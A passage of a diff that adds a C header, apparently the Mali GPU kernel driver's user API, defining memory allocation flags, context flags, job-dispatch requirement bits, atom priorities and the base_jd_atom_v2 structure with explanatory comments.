+ */
+#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
+
+/* Userspace is not allowed to free this memory.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
+
+#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
+
+/* Grow backing store on GPU Page Fault
+ */
+#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
+
+/* Page coherence Outer shareable, if available
+ */
+#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
+
+/* Page coherence Inner shareable
+ */
+#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
+
+/* IN/OUT */
+/* Should be cached on the CPU, returned if actually cached
+ */
+#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
+
+/* IN/OUT */
+/* Must have same VA on both the GPU and the CPU
+ */
+#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
+
+/* OUT */
+/* Must call mmap to acquire a GPU address for the allocation
+ */
+#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
+
+/* IN */
+/* Page coherence Outer shareable, required.
+ */
+#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
+
+/* Protected memory
+ */
+#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
+
+/* Not needed physical memory
+ */
+#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
+
+/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
+ * addresses to be the same
+ */
+#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
+
+/**
+ * Bit 19 is reserved.
+ *
+ * Do not remove, use the next unreserved bit for new flags
+ */
+#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
+
+/**
+ * Memory starting from the end of the initial commit is aligned to 'extension'
+ * pages, where 'extension' must be a power of 2 and no more than
+ * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
+
+/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
+ * mode. Some components within the GPU might only be able to access memory
+ * that is GPU cacheable. Refer to the specific GPU implementation for more
+ * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail
+ * if the memory is not aligned to GPU and CPU cache line width.
+ */
+#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
+
+/*
+ * Bits [22:25] for group_id (0~15).
+ *
+ * base_mem_group_id_set() should be used to pack a memory group ID into a
+ * base_mem_alloc_flags value instead of accessing the bits directly.
+ * base_mem_group_id_get() should be used to extract the memory group ID from
+ * a base_mem_alloc_flags value.
+ */
+#define BASEP_MEM_GROUP_ID_SHIFT 22
+#define BASE_MEM_GROUP_ID_MASK \
+ ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
+
+/* Must do CPU cache maintenance when imported memory is mapped/unmapped
+ * on GPU. Currently applicable to dma-buf type only.
+ */
+#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
+
+/* Use the GPU VA chosen by the kernel client */
+#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
+
+/* OUT */
+/* Kernel side cache sync ops required */
+#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
+
+/* Force trimming of JIT allocations when creating a new allocation */
+#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
+
+/* Number of bits used as flags for base memory management
+ *
+ * Must be kept in sync with the base_mem_alloc_flags flags
+ */
+#define BASE_MEM_FLAGS_NR_BITS 30
+
+/* A mask of all the flags which are only valid for allocations within kbase,
+ * and may not be passed from user space.
+ */
+#define BASEP_MEM_FLAGS_KERNEL_ONLY \
+ (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \
+ BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM)
+
+/* A mask for all output bits, excluding IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
+
+/* A mask for all input bits, including IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_INPUT_MASK \
+ (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
+
+/* A mask of all currently reserved flags
+ */
+#define BASE_MEM_FLAGS_RESERVED \
+ (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19)
+
+#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
+#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
+#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
+/* reserved handles ..-47<<PAGE_SHIFT> for future special handles */
+#define BASE_MEM_COOKIE_BASE (64ul << 12)
+#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
+ BASE_MEM_COOKIE_BASE)
+
+/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
+ * initial commit is aligned to 'extension' pages, where 'extension' must be a power
+ * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
+
+/**
+ * If set, the heap info address points to a __u32 holding the used size in bytes;
+ * otherwise it points to a __u64 holding the lowest address of unused memory.
+ */
+#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
+
+/**
+ * Valid set of just-in-time memory allocation flags
+ *
+ * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
+ * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
+ * and heap_info_gpu_addr being 0 will be rejected).
+ */
+#define BASE_JIT_ALLOC_VALID_FLAGS \
+ (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
+
+/**
+ * typedef base_context_create_flags - Flags to pass to ::base_context_init.
+ *
+ * Flags can be ORed together to enable multiple things.
+ *
+ * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
+ * not collide with them.
+ */
+typedef __u32 base_context_create_flags;
+
+/* No flags set */
+#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
+
+/* Base context is embedded in a cctx object (flag used for CINSTR
+ * software counter macros)
+ */
+#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
+
+/* Base context is a 'System Monitor' context for Hardware counters.
+ *
+ * One important side effect of this is that job submission is disabled.
+ */
+#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
+ ((base_context_create_flags)1 << 1)
+
+/* Bit-shift used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
+
+/* Bitmask used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
+ ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
+
+/* Bitpattern describing the base_context_create_flags that can be
+ * passed to the kernel
+ */
+#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
+ (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \
+ BASEP_CONTEXT_MMU_GROUP_ID_MASK)
+
+/* Bitpattern describing the ::base_context_create_flags that can be
+ * passed to base_context_init()
+ */
+#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
+ (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
+
+/*
+ * Private flags used on the base context
+ *
+ * These start at bit 31, and run down to zero.
+ *
+ * They share the same space as base_context_create_flags, and so must
+ * not collide with them.
+ */
+
+/* Private flag tracking whether job descriptor dumping is disabled */
+#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
+ ((base_context_create_flags)(1 << 31))
+
+/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
+ * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
+ */
+#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
+
+/* Indicate that job dumping is enabled. This could affect certain timers
+ * to account for the performance impact.
+ */
+#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
+
+#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
+ BASE_TLSTREAM_JOB_DUMPING_ENABLED)
+/*
+ * Dependency stuff, keep it private for now. May want to expose it if
+ * we decide to make the number of semaphores a configurable
+ * option.
+ */
+#define BASE_JD_ATOM_COUNT 256
+
+/* Maximum number of concurrent render passes.
+ */
+#define BASE_JD_RP_COUNT (256)
+
+/* Set/reset values for a software event */
+#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
+#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
+
+/**
+ * struct base_jd_udata - Per-job data
+ *
+ * This structure is used to store per-job data, and is completely unused
+ * by the Base driver. It can be used to store things such as callback
+ * function pointer, data to handle job completion. It is guaranteed to be
+ * untouched by the Base driver.
+ *
+ * @blob: per-job data array
+ */
+struct base_jd_udata {
+ __u64 blob[2];
+};
+
+/**
+ * typedef base_jd_dep_type - Job dependency type.
+ *
+ * A flags field will be inserted into the atom structure to specify whether a
+ * dependency is a data or ordering dependency (by putting it before/after
+ * 'core_req' in the structure it should be possible to add without changing
+ * the structure size).
+ * When the flag is set for a particular dependency to signal that it is an
+ * ordering only dependency then errors will not be propagated.
+ */
+typedef __u8 base_jd_dep_type;
+
+#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */
+#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */
+#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */
+
+/**
+ * typedef base_jd_core_req - Job chain hardware requirements.
+ *
+ * A job chain must specify what GPU features it needs to allow the
+ * driver to schedule the job correctly. By not specifying the
+ * correct settings can/will cause an early job termination. Multiple
+ * values can be ORed together to specify multiple requirements.
+ * Special case is ::BASE_JD_REQ_DEP, which is used to express complex
+ * dependencies, and that doesn't execute anything on the hardware.
+ */
+typedef __u32 base_jd_core_req;
+
+/* Requirements that come from the HW */
+
+/* No requirement, dependency only
+ */
+#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
+
+/* Requires fragment shaders
+ */
+#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
+
+/* Requires compute shaders
+ *
+ * This covers any of the following GPU job types:
+ * - Vertex Shader Job
+ * - Geometry Shader Job
+ * - An actual Compute Shader Job
+ *
+ * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
+ * job is specifically just the "Compute Shader" job type, and not the "Vertex
+ * Shader" nor the "Geometry Shader" job type.
+ */
+#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
+
+/* Requires tiling */
+#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
+
+/* Requires cache flushes */
+#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
+
+/* Requires value writeback */
+#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
+
+/* SW-only requirements - the HW does not expose these as part of the job slot
+ * capabilities
+ */
+
+/* Requires fragment job with AFBC encoding */
+#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
+
+/* SW-only requirement: coalesce completion events.
+ * If this bit is set then completion of this atom will not cause an event to
+ * be sent to userspace, whether successful or not; completion events will be
+ * deferred until an atom completes which does not have this bit set.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
+ */
+#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
+
+/* SW Only requirement: the job chain requires a coherent core group. We don't
+ * mind which coherent core group is used.
+ */
+#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
+
+/* SW Only requirement: The performance counters should be enabled only when
+ * they are needed, to reduce power consumption.
+ */
+#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
+
+/* SW Only requirement: External resources are referenced by this atom.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
+ * BASE_JD_REQ_SOFT_EVENT_WAIT.
+ */
+#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
+
+/* SW Only requirement: Software defined job. Jobs with this bit set will not be
+ * submitted to the hardware but will cause some action to happen within the
+ * driver
+ */
+#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
+
+#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1)
+#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2)
+#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3)
+
+/* 0x4 RESERVED for now */
+
+/* SW only requirement: event wait/trigger job.
+ *
+ * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
+ * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
+ * other waiting jobs. It completes immediately.
+ * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
+ * possible for other jobs to wait upon. It completes immediately.
+ */
+#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
+#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
+#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7)
+
+#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8)
+
+/* SW only requirement: Just In Time allocation
+ *
+ * This job requests a single or multiple just-in-time allocations through a
+ * list of base_jit_alloc_info structure which is passed via the jc element of
+ * the atom. The number of base_jit_alloc_info structures present in the
+ * list is passed via the nr_extres element of the atom
+ *
+ * It should be noted that the id entry in base_jit_alloc_info must not
+ * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
+ *
+ * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
+ * soft job to free the JIT allocation is still made.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9)
+
+/* SW only requirement: Just In Time free
+ *
+ * This job requests a single or multiple just-in-time allocations created by
+ * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
+ * allocations is passed via the jc element of the atom.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa)
+
+/* SW only requirement: Map external resource
+ *
+ * This job requests external resource(s) are mapped once the dependencies
+ * of the job have been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb)
+
+/* SW only requirement: Unmap external resource
+ *
+ * This job requests external resource(s) are unmapped once the dependencies
+ * of the job has been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc)
+
+/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
+ *
+ * This indicates that the Job Chain contains GPU jobs of the 'Compute
+ * Shaders' type.
+ *
+ * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
+ * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
+ */
+#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
+
+/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
+ * particular core group
+ *
+ * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
+ * takes priority
+ *
+ * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
+ *
+ * If the core availability policy is keeping the required core group turned
+ * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
+ */
+#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
+
+/* SW Flag: If this bit is set then the successful completion of this atom
+ * will not cause an event to be sent to userspace
+ */
+#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
+
+/* SW Flag: If this bit is set then completion of this atom will not cause an
+ * event to be sent to userspace, whether successful or not.
+ */
+#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
+
+/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job starts which does not have this bit set or a job completes
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
+ * if the CPU may have written to memory addressed by the job since the last job
+ * without this bit set was submitted.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
+
+/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job completes which does not have this bit set or a job starts
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
+ * if the CPU may read from or partially overwrite memory addressed by the job
+ * before the next job without this bit set completes.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
+
+/* Request the atom be executed on a specific job slot.
+ *
+ * When this flag is specified, it takes precedence over any existing job slot
+ * selection logic.
+ */
+#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
+
+/* SW-only requirement: The atom is the start of a renderpass.
+ *
+ * If this bit is set then the job chain will be soft-stopped if it causes the
+ * GPU to write beyond the end of the physical pages backing the tiler heap, and
+ * committing more memory to the heap would exceed an internal threshold. It may
+ * be resumed after running one of the job chains attached to an atom with
+ * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
+ * resumed multiple times until it completes without memory usage exceeding the
+ * threshold.
+ *
+ * Usually used with BASE_JD_REQ_T.
+ */
+#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
+
+/* SW-only requirement: The atom is the end of a renderpass.
+ *
+ * If this bit is set then the atom incorporates the CPU address of a
+ * base_jd_fragment object instead of the GPU address of a job chain.
+ *
+ * Which job chain is run depends upon whether the atom with the same renderpass
+ * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
+ * was soft-stopped when it exceeded an upper threshold for tiler heap memory
+ * usage.
+ *
+ * It also depends upon whether one of the job chains attached to the atom has
+ * already been run as part of the same renderpass (in which case it would have
+ * written unresolved multisampled and otherwise-discarded output to temporary
+ * buffers that need to be read back). The job chain for doing a forced read and
+ * forced write (from/to temporary buffers) is run as many times as necessary.
+ *
+ * Usually used with BASE_JD_REQ_FS.
+ */
+#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
+
+/* SW-only requirement: The atom needs to run on a limited core mask affinity.
+ *
+ * If this bit is set then the kbase_context.limited_core_mask will be applied
+ * to the affinity.
+ */
+#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
+
+/* These requirement bits are currently unused in base_jd_core_req
+ */
+#define BASEP_JD_REQ_RESERVED \
+ (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \
+ BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \
+ BASE_JD_REQ_EVENT_COALESCE | \
+ BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \
+ BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \
+ BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \
+ BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \
+ BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK))
+
+/* Mask of all bits in base_jd_core_req that control the type of the atom.
+ *
+ * This allows dependency only atoms to have flags set
+ */
+#define BASE_JD_REQ_ATOM_TYPE \
+ (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \
+ BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE)
+
+/**
+ * Mask of all bits in base_jd_core_req that control the type of a soft job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f)
+
+/* Returns non-zero value if core requirements passed define a soft job or
+ * a dependency only job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
+ (((core_req) & BASE_JD_REQ_SOFT_JOB) || \
+ ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
+
+/**
+ * enum kbase_jd_atom_state
+ *
+ * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
+ * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
+ * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
+ * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
+ * handed back to job dispatcher for
+ * dependency resolution.
+ * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
+ * back to userspace.
+ */
+enum kbase_jd_atom_state {
+ KBASE_JD_ATOM_STATE_UNUSED,
+ KBASE_JD_ATOM_STATE_QUEUED,
+ KBASE_JD_ATOM_STATE_IN_JS,
+ KBASE_JD_ATOM_STATE_HW_COMPLETED,
+ KBASE_JD_ATOM_STATE_COMPLETED
+};
+
+/**
+ * typedef base_atom_id - Type big enough to store an atom number in.
+ */
+typedef __u8 base_atom_id;
+
+/**
+ * struct base_dependency -
+ *
+ * @atom_id: An atom number
+ * @dependency_type: Dependency type
+ */
+struct base_dependency {
+ base_atom_id atom_id;
+ base_jd_dep_type dependency_type;
+};
+
+/**
+ * struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
+ *
+ * @norm_read_norm_write: Job chain for full rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not exceed
+ * its memory usage threshold and no fragment job chain
+ * was previously run for the same renderpass.
+ * It is used no more than once per renderpass.
+ * @norm_read_forced_write: Job chain for starting incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain exceeded
+ * its memory usage threshold for the first time and
+ * no fragment job chain was previously run for the
+ * same renderpass.
+ * Writes unresolved multisampled and normally-
+ * discarded output to temporary buffers that must be
+ * read back by a subsequent forced_read job chain
+ * before the renderpass is complete.
+ * It is used no more than once per renderpass.
+ * @forced_read_forced_write: Job chain for continuing incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain
+ * exceeded its memory usage threshold again
+ * and a fragment job chain was previously run for
+ * the same renderpass.
+ * Reads unresolved multisampled and
+ * normally-discarded output from temporary buffers
+ * written by a previous forced_write job chain and
+ * writes the same to temporary buffers again.
+ * It is used as many times as required until
+ * rendering completes.
+ * @forced_read_norm_write: Job chain for ending incremental rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not
+ * exceed its memory usage threshold this time and a
+ * fragment job chain was previously run for the same
+ * renderpass.
+ * Reads unresolved multisampled and normally-discarded
+ * output from temporary buffers written by a previous
+ * forced_write job chain in order to complete a
+ * renderpass.
+ * It is used no more than once per renderpass.
+ *
+ * This structure is referenced by the main atom structure if
+ * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
+ */
+struct base_jd_fragment {
+ __u64 norm_read_norm_write;
+ __u64 norm_read_forced_write;
+ __u64 forced_read_forced_write;
+ __u64 forced_read_norm_write;
+};
+
+/**
+ * typedef base_jd_prio - Base Atom priority.
+ *
+ * Only certain priority levels are actually implemented, as specified by the
+ * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
+ * level that is not one of those defined below.
+ *
+ * Priority levels only affect scheduling after the atoms have had dependencies
+ * resolved. For example, a low priority atom that has had its dependencies
+ * resolved might run before a higher priority atom that has not had its
+ * dependencies resolved.
+ *
+ * In general, fragment atoms do not affect non-fragment atoms with
+ * lower priorities, and vice versa. One exception is that there is only one
+ * priority value for each context. So a high-priority (e.g.) fragment atom
+ * could increase its context priority, causing its non-fragment atoms to also
+ * be scheduled sooner.
+ *
+ * The atoms are scheduled as follows with respect to their priorities:
+ * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
+ * resolved, and atom 'X' has a higher priority than atom 'Y'
+ * * If atom 'Y' is currently running on the HW, then it is interrupted to
+ * allow atom 'X' to run soon after
+ * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
+ * the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
+ * * Any two atoms that have the same priority could run in any order with
+ * respect to each other. That is, there is no ordering constraint between
+ * atoms of the same priority.
+ *
+ * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
+ * scheduled between contexts. The default value, 0, will cause higher-priority
+ * atoms to be scheduled first, regardless of their context. The value 1 will
+ * use a round-robin algorithm when deciding which context's atoms to schedule
+ * next, so higher-priority atoms can only preempt lower priority atoms within
+ * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
+ * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
+ */
+typedef __u8 base_jd_prio;
+
+/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
+#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
+/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
+ * BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
+/* Low atom priority. */
+#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
+/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
+ * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
+
+/* Count of the number of priority levels. This itself is not a valid
+ * base_jd_prio setting
+ */
+#define BASE_JD_NR_PRIO_LEVELS 4
+
+/**
+ * struct base_jd_atom_v2 - Node of a dependency graph used to submit a
+ * GPU job chain or soft-job to the kernel driver.
+ *
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep:      Pre-dependencies. One needs to use a SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ *
+ * This structure has changed since UK 10.2 for which base_jd_core_req was a
+ * __u16 value.
+ *
+ * In UK 10.3 a core_req field of a __u32 type was added to the end of the
+ * structure, and the place in the structure previously occupied by __u16
+ * core_req was kept but renamed to compat_core_req.
+ *
+ * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
+ * Compatibility with UK 10.x from UK 11.y is not handled because
+ * the major version increase prevents this.
+ *
+ * For UK 11.20 jit_id[2] must be initialized to zero.
+ */
+struct base_jd_atom_v2 {
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+};
+
+/**
+ * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
+ * at the beginning.
+ *
+ * @seq_nr: Sequence number of logical grouping of atoms.
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
